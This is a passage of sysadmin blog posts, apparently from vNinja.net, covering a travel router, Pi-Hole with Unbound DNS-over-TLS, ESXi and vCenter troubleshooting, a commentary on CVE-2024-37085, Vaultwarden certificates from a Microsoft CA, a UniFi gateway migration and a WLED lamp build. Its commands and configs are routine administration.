After some research, I ended up purchasing a GL-iNet Opal (GL-SFT1200) Travel Router. The device seems to tick all the boxes for my requirements, including WireGuard and DNS encryption (it also supports OpenVPN and several other commercial VPN providers). It comes in a very small (118 x 85 x 30mm / 145g) package, powered via USB-C. Handy! The initial setup was really quick, easy, and very straightforward. Connecting the built-in WireGuard client to my existing WireGuard server was also a simple matter of configuration. The WireGuard VPN throughput is limited (max. 65Mbps), but more than enough for my current needs, and if it turns out I need more bandwidth later, I can upgrade to one of the larger models then. It also supports sharing an isolated Guest WiFi, which allows me to share my WiFi with others without that traffic being routed through my VPN (based on the VLAN). That allows sharing of my connection without worrying about the clients connecting to anything else besides the internet, as well as isolating those clients from each other. That's the current setup I have: one "Private WiFi" for my own VPN-secured connections, and one "Guest WiFi" for other devices/people.

Conclusion #

All in all, I am impressed so far.
I have tested connecting it to WiFis with captive portals, which seems to work just fine. Tethering to my phone also looks to work perfectly (bonus points!). I have not tested this yet, but its power draw of <6W should also make it quite possible to power it via a power bank in my backpack, if required. The Opal runs on a custom version of OpenWRT, albeit an older 18.06 version, so there are pretty much endless possibilities as far as configuration goes. I will come back with a more detailed review once I've used it for an extended period of time, as well as some details on my configuration and setup.

---
# My Updated Pi-Hole Setup
URL: https://vNinja.net/2024/08/10/my-updated-pi-hole-setup/
Date: 2024-08-10
Author: christian
Tags: Pi-Hole, DNS

Back in 2018 I outlined My Pi-Hole Setup, and while the setup is still mostly the same, some things have naturally evolved from there. That being said, Pi-Hole has been rock solid for all these years, and is still my main go-to for blocking ads and trackers from my home network devices. Since that post from 2018, I have done a few changes.

1. Multi-Instance Pi-Hole #

I now run a multi-instance Pi-Hole setup, based on Gravity Sync. Basically, Gravity Sync ensures that my two instances' block lists are synced. This has worked very well for quite a long time, but Gravity Sync has now been retired by the author. It should continue to work until Pi-Hole v6 is released. I will have to cross that bridge when I get to it, I guess. Perhaps that will be a good time to move over to running Pi-Hole in containers, instead of VMs.

2. Auto-updating Pi-Hole #

My Pi-Hole instances auto-update via a simple cron job. Once every 24h it runs pihole -up. This has worked flawlessly for a couple of years now, but I anticipate that there might very well be issues when Pi-Hole v6 is released.

```shell
0 6 * * * pihole -up
```

3. Use Unbound as recursive DNS for DNSSEC and DNS over TLS (DoT) support #

My Pi-Hole instances now forward requests to Unbound.
The setup I use is documented in Setting up Pi-hole as a recursive DNS server solution, and works well out of the box. The setup ensures DNSSEC support, for greater security. If you want to test your DNSSEC status, check DNSSEC Resolver Test or dnscheck.tools/. I have also added DNS over TLS (DoT) configuration to Unbound, by adding the following to /etc/unbound/unbound.conf.d/pi-hole.conf:

```
tls-cert-bundle: /etc/ssl/certs/ca-certificates.crt

forward-zone:
    name: "."
    forward-addr: 1.1.1.1@853#cloudflare-dns.com
    forward-addr: 1.0.0.1@853#cloudflare-dns.com
    forward-ssl-upstream: yes
```

Cloudflare has a good test for DNS over TLS (DoT) and DNS over HTTPS (DoH) available on 1.1.1.1/help. Of course, I still run Conditional Forwarding in Pi-Hole for local DNS lookups, which happens before Pi-Hole sends queries to Unbound and out of my network. All in all, it still works mostly the same as it did when I initially set it up, but now it has some added security, which I am very happy with.

---
# Driver Issues When Updating VMware ESXi With vLCM Images
URL: https://vNinja.net/2024/08/05/driver_issues_when_updating_vmware_esxi_with_vlcm_images/
Date: 2024-08-05
Author: stine
Tags: VMware, vCenter, vSphere, vLCM

Since baselines are deprecated in vSphere 8, and are restricted to VMware-provided content only after ESXi 7.0.3 Update P, I helped one of my customers move over to image-based updating via vLCM. This has not been without issues, as mentioned in my previous post. This time I was updating a 7.0.3 installation of ESXi to Update Q and got stuck on a driver issue that I had not seen before: "Downgrades of manually added component Mellanox Native OFED ConnectX-3 Drivers (3.19.70.1) in the desired ESXi version are not supported". From a quick Google search I realized I was not the only one who had issues with this driver, and figured out I had to downgrade it.
Firstly, I checked whether the Mellanox card was in use, both via the hardware view in iDRAC (since this is a Dell server) and via the hardware tab in ESXi. Luckily, the card was not in use, so I manually removed the driver and updated the host using images afterwards. In case anyone else has this problem, this is the way to solve it:

1. Place the host in Maintenance Mode.
2. Log onto your host using root credentials over SSH.
3. Run this command: esxcli software vib remove -n nmlx5-core -n nmlx5-rdma -n nmlx4-core -n nmlx4-en -n nmlx4-rdma

The expected output is:

```
The update completed successfully, but the system needs to be rebooted for the changes to be effective.
Reboot Required: true
VIBs Installed:
VIBs Removed: MEL_bootbank_nmlx4-core_3.19.70.1-1OEM.670.0.0.8169922, MEL_bootbank_nmlx4-en_3.19.70.1-1OEM.670.0.0.8169922, MEL_bootbank_nmlx4-rdma_3.19.70.1-1OEM.670.0.0.8169922, MEL_bootbank_nmlx5-core_4.19.70.1-1OEM.700.1.0.15525992, MEL_bootbank_nmlx5-rdma_4.19.70.1-1OEM.700.1.0.15525992
VIBs Skipped:
```

Your next and final step is to reboot the host, either from the SSH command line using the command reboot, or from the GUI. Then proceed updating your host with your image via vLCM. Hope this can help anyone out there who gets stuck on the same thing!

---
# VMware Explore 2024 Barcelona Content Catalog Is Now Live
URL: https://vNinja.net/2024/07/31/vmware-explore-2024-barcelona-content-catalog-is-live/
Date: 2024-07-31
Author: christian
Tags: VMware, Explore, VMware Explore 2024

The content catalog for VMware Explore 2024 Barcelona (4 - 7 November) is now live! Scheduling will open on the 24th of September 2024, but you can start favouriting sessions now for easy access. As in 2023, I have been lucky enough to have a couple of sessions accepted:

Beware Of The Rogue VMs! [CMTY1321BCN] #

Description: Do you have Rogue VMs in your vSphere environment? No? Are you sure?
Recent security breaches have highlighted how attackers use rogue VMs to hide their activity in a vSphere environment. In this session I'll show how those VMs can be created, how they are made persistent, and how they remain hidden in an environment. I will also walk through how these VMs can be detected, and how to prevent attackers from creating them in the first place.

Tracks: Cloud Infrastructure
Session Type: Community Quick Talk
Level: Technical 200
Products: VMware Cloud Foundation, VMware vSphere Foundation
Audience: IT Practitioner

How I Went NUTs With PowerCLI — Building a UPS Shutdown Solution [CODE1322BCN] #

Description: This session walks through how I built a Network UPS Tools (NUT) solution, with PowerCLI, to shut down my home lab environment when required. The solution consists of PowerCLI Core in a container, combined with Pode, which provides a REST API that NUT uses to manage shutdown events.

Tracks: Cloud Infrastructure
Session Type: VMware {code}
Level: Technical 200
Products: VMware Cloud Foundation, VMware vSphere Foundation
Audience: IT Practitioner

---
# vCenter Upgrade 8.0 U3a vSphere Lifecycle Manager Port Issues
URL: https://vNinja.net/2024/07/30/vcenter-upgrade-8.0u3a-vsphere-lifecycle-manager-port-issues/
Date: 2024-07-30
Author: stine
Tags: VMware, vCenter, vSphere, vLCM

I was updating one of my customers' environments to vCenter 8.0 Update 3a today, and was moving from the old vSphere Update Manager Baselines over to image-based updating via vSphere Lifecycle Manager (vLCM), but the compliance check stopped at 30% for some reason. I had a look through lifecycle.log and found several timeout errors. It turns out that vCenter 8.0 Update 3a changes how vSphere Lifecycle Manager downloads updates for ESXi hosts, and if port 9087 is not open between the ESXi hosts and vCenter, it fails. This is documented in the release notes for vCenter 8.0 Update 3, but is very easily missed.
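A quick way to check that reachability, from any machine with shell access on the same network path, is a plain TCP connect test. A hedged sketch, with vcenter.example.com as a placeholder for the vCenter FQDN:

```shell
#!/bin/bash
# Sketch: check whether TCP port 9087 on vCenter is reachable. Uses bash's
# built-in /dev/tcp device, so no extra tooling is needed;
# vcenter.example.com is a placeholder.
port_open() {
  # succeed (exit 0) if a TCP connection to $1:$2 opens within 2 seconds
  timeout 2 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

if port_open vcenter.example.com 9087; then
  echo "port 9087 reachable"
else
  echo "port 9087 blocked, filtered, or host unreachable"
fi
```

A connect test only proves the firewall path; a successful compliance check is still the real confirmation.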
Therefore, if you have issues with the compliance check, make sure that port 9087 is open between the ESXi hosts and vCenter.

---
# VMware vSphere CVE-2024-37085 - A Nothing Burger
URL: https://vNinja.net/2024/07/29/vmware-vsphere-cve-2024-37085/
Date: 2024-07-29
Author: christian
Tags: VMware, Broadcom, Security

Microsoft has caused some noise today with CVE-2024-37085, which describes a well-known feature in vSphere. A feature that has been available since vSphere 5.1 came out in September 2012 (no, that is not a typo, it is in fact 12 years old). The feature in question is that if an ESXi host is joined to an Active Directory domain, it will by default look for an AD group called ESX Admins and grant every member of that group root access to the host (via the Web Client, not via SSH). While I happily agree that this isn't a very good idea, it is also very well documented and explained both in the VMware vSphere documentation, and specifically called out in the vSphere Hardening Guides (esxi-8.ad-enable: Use Active Directory for ESXi user authentication), as well as in STIG (V-256404). ESXi hosts are not added to Active Directory by default, so for installations where this has not been specifically configured, this is not an issue at all. The general advice is to NOT join ESXi hosts to Active Directory, as there are near to zero valid use cases for it. In order to exploit this feature for nefarious reasons, like the ones Microsoft highlights, a number of prerequisites need to be in place:

a) Root access to the ESXi host(s), and a user account that can join it to AD and create an ESX Admins AD security group, or change the advanced setting Config.HostAgent.plugins.hostsvc.esxAdminsGroup on the host to use some other security group from AD.

or

b) The host(s) need to be AD domain-joined already, and you have AD permissions to add a user account to an existing ESX Admins security group (or create a new one if it doesn't already exist).
So, to be perfectly clear, you either need root access to the ESXi host(s) in question, or permissions in Active Directory, to be able to exploit this. And if you have ESXi root access already, why would you go to the trouble of adding an ESXi host to the domain? As Melissa said:

> Like are we missing the part where the threat actors have ad? Game over anyway. — vmiss (@vmiss33) July 29, 2024

This behaviour only applies when joining ESXi hosts to an Active Directory domain, and does not in any way include joining VMware vCenter systems to Active Directory. vCenter does not look for, or utilize, the ESX Admins security group. I am glad this feature is being removed by VMware by Broadcom, as it really serves no purpose any more, but to call this a security bypass vulnerability is taking it too far. It's a feature that works as intended, and is documented with existing advisories and mitigation routines. How that warrants an official CVE is beyond my comprehension. So I guess congratulations are in order, Microsoft, you have read the official VMware documentation! Kudos!

Update 30th July 2024: cyberscoop.com picked up this blog post, and asked Microsoft for comments. Read about it in Microsoft calls out apparent ESXi vulnerability that some researchers say is a 'nothing burger'

---
# Where Did My VMware Security Advisories Go? They Went Here!
URL: https://vNinja.net/2024/05/13/where-did-my-vmware-security-advisories-go-here/
Date: 2024-05-13
Author: christian
Tags: VMware, Broadcom, Security

VMware by Broadcom recently published a blog post called Where did my VMware Security Advisories go?, outlining the location changes for the VMware Security Advisories (VMSAs) and making clear that from May 6th 2024 they are moved to the Broadcom Support Portal. While this was anticipated as part of the content transition following the acquisition, it was not anticipated that the VMSAs would be moved into a walled garden that required a login.
While it was free to create an account and get access to the advisories, this was a move that caused some uproar and controversy. Thankfully VMware by Broadcom has reconsidered the login requirement, and the advisories are again easily accessible for everyone. Links below!

VMware by Broadcom VMSA Links #

| Product Line | Link |
| --- | --- |
| VMware Cloud Foundation | Security Advisories - VMware Cloud Foundation |
| Tanzu | Security Advisories - Tanzu |
| Application Networking and Security | Security Advisories - Application Networking and Security |
| Software Defined Edge | Security Advisories - Software Defined Edge |

Also, note that VMSAs for EUC products will continue to be published on www.vmware.com/security/advisories, and are not moved as part of this change.

---
# VMware by Broadcom Promises Free Security Updates for vSphere
URL: https://vNinja.net/2024/04/16/vmware-by-broadcom-promises-security-updates/
Date: 2024-04-16
Author: christian
Tags: VMware, vSphere, ESXi, vCenter

In a new blog post by Broadcom CEO Hock Tan, VMware by Broadcom promises that they will continue to provide security updates for VMware vSphere and other products for all customers who are running the old perpetual licenses, even if those customers don't transition to the new subscription-based license model.

> To ensure that customers whose maintenance and support contracts have expired and choose to not continue on one of our subscription offerings are able to use perpetual licenses in a safe and secure fashion, we are announcing free access to zero-day security patches for supported versions of vSphere, and we'll add other VMware products over time.

At the moment, this means that the following products will get security updates, regardless of valid support status, based on the Product Lifecycle Matrix:

| Product Name | End of General Support |
| --- | --- |
| vCenter and ESXi 7 | 02. April 2025 |
| vCenter and ESXi 8 | 11. November 2027 |

vSphere 6.7 reached end of support in October 2022 and is no longer supported, nor are any previous versions.
Update 18th April 2024: VMware by Broadcom has also published Zero Day (i.e., Critical) Security Patches for vSphere (7.x and 8.x) Perpetual License Customers with Expired Support Contracts (97805), which confirms that vSphere 7 and 8 are the versions supported, and that existing patch mechanisms will continue to work. This is a very welcome clarification by Broadcom, as the new licensing scheme and pricing is still a hot discussion topic, and hopefully this list will be expanded in the time to come!

---
# Vaultwarden+Caddy and Microsoft CA
URL: https://vNinja.net/2024/03/06/vaultwarden-caddy-and-microsoft-ca/
Date: 2024-03-06
Author: christian
Tags: Vaultwarden, Caddy, Microsoft CA, PKI, TLS

In my work lab environment, we have a need to share passwords and other login credentials among the team who uses it. Recently we decided to try out Vaultwarden for this purpose. Linuxiac.com has a great guide on setting up Vaultwarden with Caddy using Docker Compose, but this particular setup relies on Let's Encrypt SSL certificates. Let's Encrypt is great, but requires some online presence, which we don't want for this environment. In addition, we have an internal Microsoft CA-based PKI infrastructure that we wanted to use for this purpose. The setup follows the guide mentioned above, with some tweaks to utilize the internal PKI infrastructure. This includes the use of Caddy as a reverse proxy. Specifically, it uses caddy-docker-proxy, which allows for Caddy configuration via labels in the Docker configuration.

Generating Certificates for Vaultwarden from a Microsoft CA #

First off, we need to create a Certificate Signing Request (CSR) for the Vaultwarden service. This CSR then needs to be processed on the Microsoft CA in order for it to create a certificate that we can use in Caddy.
The following steps were performed on the Linux VM (Photon OS) hosting the Vaultwarden+Caddy Docker configuration.

Creating a private key #

We need a private key to sign the Certificate Signing Request (CSR) with. This can easily be created with the following command:

```shell
openssl genrsa -out vaultwarden.key 2048
```

This generates a key file without any password protection, which is not recommended for production use. Check the OpenSSL documentation for recommended practices.

Generating a Certificate Signing Request (CSR) with Subject Alternative Name (SAN) #

In order for modern browsers to accept the certificate they get presented, the Subject Alternative Name (SAN) needs to be supplied. For OpenSSL to be able to create a CSR which contains that information, an OpenSSL .cnf file needs to be provided. I called mine vaultwarden.cnf and placed it in my current working directory:

```
[req]
distinguished_name = req_distinguished_name
req_extensions = req_ext
prompt = no

[req_distinguished_name]
C = NO
ST = Vestland
L = Bergen
O = Lab
OU = Lab
CN = vaultwarden.<mydomain>

[req_ext]
subjectAltName = @alt_names

[alt_names]
IP.1 = 172.16.4.15
DNS.1 = vaultwarden.<mydomain>
DNS.2 = vaultwarden
```

The values in this file need to be updated to reflect the environment it is being deployed in. The SAN is defined under [alt_names], and I included the IP address, the FQDN, and the hostname to cover all my bases. These names coincide with the names defined in our internal DNS, as well as the values used in the docker-compose.yaml file that comes from the How to Install Vaultwarden Password Manager with Docker guide. Generating the CSR is then done by running the following command, utilizing the .key and .cnf files created earlier:

```shell
openssl req -new -key vaultwarden.key -out vaultwarden.csr -config vaultwarden.cnf
```

The result is a new file, called vaultwarden.csr, that needs to be submitted to the Microsoft CA to generate the certificate.
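Before submitting the CSR, it can be worth verifying that the SAN entries actually made it in, since a certificate without them will be rejected by modern browsers. A self-contained sketch of that check, using throwaway files under /tmp and example.com as a placeholder domain:

```shell
#!/bin/sh
# Sketch: generate a throwaway key and CSR like the ones above, then inspect
# the requested SANs with openssl before sending the CSR to the CA.
# example.com is a placeholder domain; all paths here are throwaway.
openssl genrsa -out /tmp/vaultwarden.key 2048 2>/dev/null

cat > /tmp/vaultwarden.cnf <<'EOF'
[req]
distinguished_name = req_distinguished_name
req_extensions = req_ext
prompt = no
[req_distinguished_name]
CN = vaultwarden.example.com
[req_ext]
subjectAltName = @alt_names
[alt_names]
IP.1 = 172.16.4.15
DNS.1 = vaultwarden.example.com
DNS.2 = vaultwarden
EOF

openssl req -new -key /tmp/vaultwarden.key -out /tmp/vaultwarden.csr \
  -config /tmp/vaultwarden.cnf

# The output should list both DNS names and the IP address:
openssl req -in /tmp/vaultwarden.csr -noout -text \
  | grep -A1 'Subject Alternative Name'
```

If the grep comes back empty, the req_extensions/subjectAltName wiring in the .cnf file is the first place to look.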
Submitting the CSR to the Microsoft CA with certreq #

Copy the generated vaultwarden.csr file to your Microsoft CA. From there, use certreq to submit it to the CA. I have a Certificate Template called WebServer2Y that was used to generate the certificate. The command used was (replace ca-name\Issuing CA01 with the correct values for your environment):

```shell
certreq -submit -config "ca-name\Issuing CA01" -attrib "CertificateTemplate:WebServer2Y" .\vaultwarden.csr .\vaultwarden.cer
```

This generates the vaultwarden.cer certificate in the current working directory.

Configuring Caddy to use the new certificate, in docker-compose.yaml #

In order for Caddy to use the new certificate (vaultwarden.cer) and key (vaultwarden.key), the files need to be copied to the correct location based on the docker-compose.yaml setup. By default, /data/caddy/ in this setup maps to /var/lib/docker/volumes/vaultwarden_caddy_data/_data/caddy/ on the physical filesystem, so I created the /var/lib/docker/volumes/vaultwarden_caddy_data/_data/caddy/tls/ folder and copied the vaultwarden.cer and vaultwarden.key files to that location. Edit docker-compose.yaml and add caddy.tls under labels, with a relative path to the vaultwarden.cer and vaultwarden.key files:

```yaml
labels:
  ...
  caddy.tls: /data/caddy/tls/vaultwarden.cer /data/caddy/tls/vaultwarden.key
```

Configuring caddy.tls to use the local certificate and key turns off the Caddy default of connecting to Let's Encrypt and trying to get a public certificate. Once that whole task was complete, starting Caddy and Vaultwarden with docker-compose up -d works as intended, and the Vaultwarden interface is available with an internally signed and valid certificate.
```shell
root@vaultwarden [ ~/vaultwarden ]# docker-compose up -d
[+] Running 2/2
 ✔ Container reverse-proxy  Started
 ✔ Container vaultwarden    Started
```

--- # Migrating from Unifi USG to UXG-Lite URL: https://vNinja.net/2024/02/19/migrating-from-usg-to-uxg-lite/ Date: 2024-02-19 Author: christian Tags: networking, ubiquiti, UXG-Lite, USG, UniFi It was finally time to replace my old UniFi Security Gateway (USG) 3P with its shiny new brother, the Gateway Lite (UXG-Lite). The USG 3P has served me well over the last 5 or so years, but as the new UXG-Lite promises better throughput, especially when enabling IDS/IPS, it was time to replace it. In addition to the routing performance improvements, the UXG-Lite also offers WireGuard VPN support out of the box, which will allow me to get rid of my old L2TP VPN setup. I am sure there are other new features available that I have not investigated yet. Here’s how I migrated my entire home network from the USG-3P to the new UXG-Lite, with nothing more than a couple of minutes of downtime in total. I utilize Hostifi for my UniFi controller needs; if you use a local Cloud Key the procedure might differ.

USG to UXG-Lite Migration Procedure using a Temporary Site on Hostifi #

- Create a new temporary Site on Hostifi
- Connect the UXG-Lite beside my existing USG-3P, on the WAN port. Luckily I have a fiber connection with more than one IP, so I could connect it beside the existing gateway.
- Connect the LAN port on the UXG-Lite directly to an ethernet adapter on a laptop or desktop computer
- Verify that a 192.168.1.x IP is assigned to the ethernet adapter
- Open https://192.168.1.1
- Select “Manually Connect to UniFi Network”
- Enter the Hostifi FQDN, and credentials
- Select the Temporary site to assign the UXG-Lite to
- Log into Hostifi and update the UXG-Lite (if required). Mine was on 3.1.15, newest available was 3.1.6.12746

Once that was done, I went back to my original site and removed the USG-3P from my site, while still connected to my UXG-Lite.
I then disconnected the USG-3P from my network, both WAN and LAN cables. The next step was going back to my temporary site, and moving the UXG-Lite to my original site. After a minute or two of downtime, I was back online with my laptop, and the UXG-Lite was now the main gateway in my original site. The last step was connecting my LAN ethernet cable to my switch, and disconnecting it from my laptop. Once these steps were completed, the new UXG-Lite was online and enrolled into my UniFi site. All my previous configuration was retained as it was, and my UniFi network was up and running again within minutes. All in all, a very seamless and straightforward procedure with minimal downtime. --- # Let's Talk Data by Proact URL: https://vNinja.net/2024/01/26/lets-talk-data-proact/ Date: 2024-01-26 Author: christian Tags: Podcast My employer, Proact, has a podcast called Let’s Talk Data, and I have recently joined as a permanent member of the panel after having been a guest a couple of times before. Along with my colleagues Tony Gent and Christian Lehrer, we dive into various IT topics. This is a general IT podcast, as the tagline suggests: The Podcast for IT-professionals – by IT-professionals. For the first time since vSoup, I’ll be a regular podcaster again — and this time, it includes video! Here it is, the YouTube version of the first episode I’m a part of. Technology trends of 2024 – Rethinking Cyber Resiliency # It is also available on Spotify and Apple Podcasts. More to come in the coming weeks and months! --- # Removing vCLS Machines in vSphere 7.0.3 URL: https://vNinja.net/2023/12/30/removing-vcls-machines/ Date: 2023-12-30 Author: stine Tags: ESXi, VMware, vSphere, vCenter I was recently contacted by a customer that needed help with some vCLS VMs that had somehow been moved to a different datastore and now resided on servers they weren’t registered on.
I tried to remove them by following this very good post written by Duncan Epping, but I realized it would never work, since the services don’t expect the vCLS VMs to have moved and consider them missing. This is how I solved the problem:

- I put the host with the vCLS machines in maintenance mode.
- Went to the UI of the host.
- Selected the VMs and unregistered them.
- Unregistered the host from vCenter and registered the host again.

--- # Fun and Games With WLED, ESP32, IKEA UPPLYST and Home Assistant URL: https://vNinja.net/2023/12/17/fun-and-games-with-wled-esp32-ikea-upplyst-and-homeassistant/ Date: 2023-12-17 Author: christian Tags: Home Assistant, Home Automation IKEA has a fun little LED lamp called UPPLYST which is shaped like a cloud — which in my line of work is symbolic in more ways than one. I’ve been using this lamp in the background of my video meetings from the home office for quite some time, but recently decided to have some more fun with it. I’ve had it connected to a smart outlet that I can turn on/off via Home Assistant, and I’ve created a webhook to toggle it on/off, which I then call from my Elgato Stream Deck for easy accessibility. Removing the existing LED light inside of the UPPLYST lamp is a simple operation, as the LED is fixed to a back-plate that pops out via three simple plastic clips. The same goes for the LED fixture; it’s easily removable as well, once the back-plate has been removed. Once that was done, I added an ESP32-DevKitC that I had flashed with WLED, connected to a 5V Pixel Ring Round LED Circle with 12 addressable LEDs. Since the ESP32 supplies 5V directly to the Pixel Ring, there is no need for an external power supply. WLED makes it really easy to configure the ESP32 and get it connected to my home IoT network. It is also detected automatically in Home Assistant, and controllable from there immediately after adding it.
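The webhook toggle mentioned above can be triggered with a plain HTTP POST to Home Assistant's /api/webhook/&lt;webhook_id&gt; endpoint, which requires no authentication token. A minimal sketch, where both the host name and the webhook id are hypothetical placeholders for illustration:

```shell
# Build the webhook URL for a Home Assistant automation.
# Host and webhook id are placeholders; substitute your own instance and id.
HA_HOST="homeassistant.local:8123"
WEBHOOK_ID="cloud-toggle"
URL="http://${HA_HOST}/api/webhook/${WEBHOOK_ID}"
echo "$URL"
# Trigger it (with local_only: true the call must come from the local network):
# curl -X POST "$URL"
```

This is exactly the kind of URL a Stream Deck button (or anything else that can issue an HTTP request) can call.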
My “final” setup is pretty simple: I fixed the LED Pixel Ring to the IKEA back-plate using Tack-It, and the ESP32 itself is just attached using some velcro! I then re-assembled the light fixture, and hung it back on the peg-board where it belongs.

Part list #

- IKEA LED UPPLYST
- ESP32-DevKitC
- 5V Pixel Ring Round LED Circle
- Dupont Cables
- Tack-It
- Velcro
- USB Power for the ESP32-DevKitC

This is what the final result looks like, with effects called via webhooks in Home Assistant from my Stream Deck — And yes, I know I can see the red light from the onboard LED on the ESP32. I should have mounted it the other way around. Of course, this can be automated in other ways as well; this is just an example of how it can be called from a third party.

WLED Effects and Home Assistant #

Lightning #

The lightning effect in the video, for instance, has the following automation code in Home Assistant:

```yaml
alias: Cloud Lightning
description: ""
trigger:
  - platform: webhook
    allowed_methods:
      - POST
      - PUT
    local_only: true
    webhook_id: storm
condition: []
action:
  - service: light.turn_on
    target:
      entity_id: []
      device_id:
        - f2253fe283ebeeb725aac76887945f22
      area_id: []
    data:
      effect: Lightning
      rgb_color:
        - 255
        - 255
        - 255
mode: single
```

Red color effect #

The red color effect in the video has the following automation code in Home Assistant:

```yaml
alias: Cloud Red
description: ""
trigger:
  - platform: webhook
    allowed_methods:
      - POST
      - PUT
    local_only: true
    webhook_id: cloud-red
condition: []
action:
  - service: light.turn_on
    target:
      entity_id: []
      device_id:
        - f2253fe283ebeeb725aac76887945f22
      area_id: []
    data:
      rgb_color:
        - 255
        - 0
        - 0
      effect: Solid
mode: single
```

--- # Down the Rabbit Hole With VMware Aria Automation Config @ Explore 2023 [VMTN2239BCN] URL: https://vNinja.net/2023/11/08/down-the-rabbit-hole-with-vmware-aria-automation-config-explore-2023/ Date: 2023-11-08 Author: christian Tags: VMware, Explore At VMware Explore 2023 Barcelona I was lucky enough to be able to present my Down the Rabbit
Hole With VMware Aria Automation Config session, and the good people behind vBrownBag have made a recording of it available on YouTube! This is a shortened version of the talk I also did at TechX 300 in Copenhagen in September. All the code for the demos is available in my Down-The-Rabbit-Hole/AriaAutomationConfig GitHub repository. --- # VMware Explore 2023 Barcelona Partner Leadership Forum URL: https://vNinja.net/2023/11/03/vmware-explore-2023-barcelona-partner-leadership-forum/ Date: 2023-11-03 Author: christian Tags: VMware, Explore Alex Matthews opening the Partner Technical Leadership Forum My VMware Explore 2023 Barcelona week kicked off with a Partner Technical Leadership Forum at the Fira. The first session was VMware Generative AI Strategy with Robbie Jerrom, Principal Solutions Engineer, who provided a great overview of what VMware is doing in the AI space, and how VMware Private AI can help enterprises manage AI in a properly architected manner, in their own environments. Martin Hosken presenting Next up was Martin Hosken, Chief Technologist Cloud EMEA, with a session on Multi-Cloud and beyond, looking at current trends, especially the trend of repatriation from the hyperscalers. Theresa Thompson presenting Theresa Thompson, Staff Technical Marketing Architect, had a very good session on VCF Holodeck, going through what it is, how it should be used, and what scenarios and use cases it covers. The last session was a partner-specific panel with Scott Berquist, Senior Director Ecosystem Solutions, and Alex Matthews, Senior Director, Solution Engineering, Partners & Digital, with a Q&A section at the end. Alex Matthews and Scott Berquist The entire session was under NDA, so I can’t get into specifics, but it was time very well spent. Kudos to the team behind it, like Linda Smith, who I know had to reshuffle the entire agenda due to external factors.
--- # Updating Shodan Monitor Assets via REST API and Curl URL: https://vNinja.net/2023/11/01/updating-shodan-monitor-assets-via-rest-api-and-curl/ Date: 2023-11-01 Author: christian Tags: Shodan, Monitoring, bash Shodan Monitor is a service by shodan.io that allows for monitoring of IPs, networks or domains, based on your own definitions. In my case, I use it to monitor my home network public IP, and to alert me if there is anything strange going on, like new services or any other abnormalities. Shodan Monitor Trigger Definitions This is very useful, and I get alerts both via a Slack Webhook and email, but like most residential connections, I have a dynamic IP address from my ISP. It doesn’t change often, but it happens. My Shodan Monitor definition is based on an IP assignment, and all of a sudden I got notifications for things that were not present in my network. My public IP had changed, and I was now receiving alerts for someone else’s network, which had been assigned my old public IP. Suboptimal. One way of solving this is setting up the monitoring to monitor a Dynamic DNS entry that gets automatically updated whenever my public IP changes. Simple enough to set up, but not nearly as fun as the solution I ended up with. Description # In the end I created a small bash script that runs as a scheduled cron job on a VM in my environment. In short, the script checks my public IP through the Shodan CLI and compares it with the IP address stored in a file called shodanip.txt (the file gets created if it does not already exist). Other methods of obtaining the current public IP can be used as well, but the script utilizes the shodan myip command to fetch it. If the IPs match, it quits; in all other cases it updates the shodanip.txt file with the new IP address, and then uses the Shodan REST API to update the Monitor Asset to the new value (via curl).
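As a rough illustration of that logic, here is a minimal sketch of such a script. This is not the author's actual script: the variable names are mine, the 203.0.113.10 default is a documentation placeholder standing in for a real `shodan myip` lookup, and the commented-out alert-edit endpoint and payload are assumptions that must be verified against the Shodan REST API documentation before use:

```shell
#!/bin/sh
# Sketch of the IP-watcher described above (hypothetical, not the original).
API_KEY="${SHODAN_API_KEY:-changeme}"
ALERT_ID="${SHODAN_ALERT_ID:-changeme}"
IP_FILE="${IP_FILE:-./shodanip.txt}"
# Real script would use: current_ip=$(shodan myip)
current_ip="${CURRENT_IP:-203.0.113.10}"

[ -f "$IP_FILE" ] || : > "$IP_FILE"   # create the state file if missing
stored_ip="$(cat "$IP_FILE")"

if [ "$current_ip" = "$stored_ip" ]; then
  echo "IP unchanged, nothing to do"
else
  echo "$current_ip" > "$IP_FILE"
  # Assumed endpoint and payload -- check the Shodan REST API docs:
  # curl -s -X POST "https://api.shodan.io/shodan/alert/$ALERT_ID?key=$API_KEY" \
  #      -H 'Content-Type: application/json' \
  #      -d "{\"filters\": {\"ip\": [\"$current_ip\"]}}"
  echo "updated monitor asset to $current_ip"
fi
```

Run from cron, the compare-then-update shape means the API is only touched when the public IP actually changes.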
The script requires that you have your own Shodan API Key and that you know the Shodan Alert ID for the Monitor Asset you want to edit. To find the Shodan Alert ID, either look at the URL when you edit an asset in Shodan Monitor (it’s the value shown right after monitor.shodan.io/networks/edit/ in the browser), or use the shodan alert list command via the Shodan CLI to get the Alert ID. These values, and the location of the shodanip.txt file, are defined in lines 8 - 11 in the script, under the heading #Variables The Script # Hopefully this is useful for someone else as well; at least this should save me from getting wrong alerts from Shodan whenever someone gets assigned my old public IP from my ISP. I should probably update my Dynamic DNS Update script as well. --- # vSphere Distributed Switch Configuration on Some Hosts Differed From That of the vCenter Server URL: https://vNinja.net/2023/11/01/vsphere-distributed-switch-configuration-on-some-hosts-differed-from-that-of-the-vcenter-server/ Date: 2023-11-01 Author: stine Tags: ESXi, VMware, vSphere, vCenter I recently came across the message “The vSphere Distributed Switch configuration on some hosts differed from that of the vCenter Server” when I was going to upgrade some vDS switches. There were several complicated solutions presented to me via Google, but this is how I eventually managed to fix it easily. Find the ports that are listed in the error and navigate to the Port section of the vDS: Select the port that has the issue and open the Statistic section: Select the Auto-refresh button, wait a couple of minutes, and the message should clear itself. Remember to turn this setting off after the problem is sorted.
--- # Tips for VMware Explore Barcelona 2023 URL: https://vNinja.net/2023/10/18/tips-vmware-explore-barcelona-2023/ Date: 2023-10-18 Author: stine Tags: VMware Explore Barcelona 2023 is upon us, and if you are travelling for the first time or just looking for some general tips about the conference, look no further. I previously wrote about my experience traveling to VMware Explore last year. It was my first trip to VMware Explore, which was also my first big convention. My tips are characterized by Explore having been downsized last year before a lot of last-minute registrations, so everything was very crowded. Which leads me to my first tip:

Sessions #

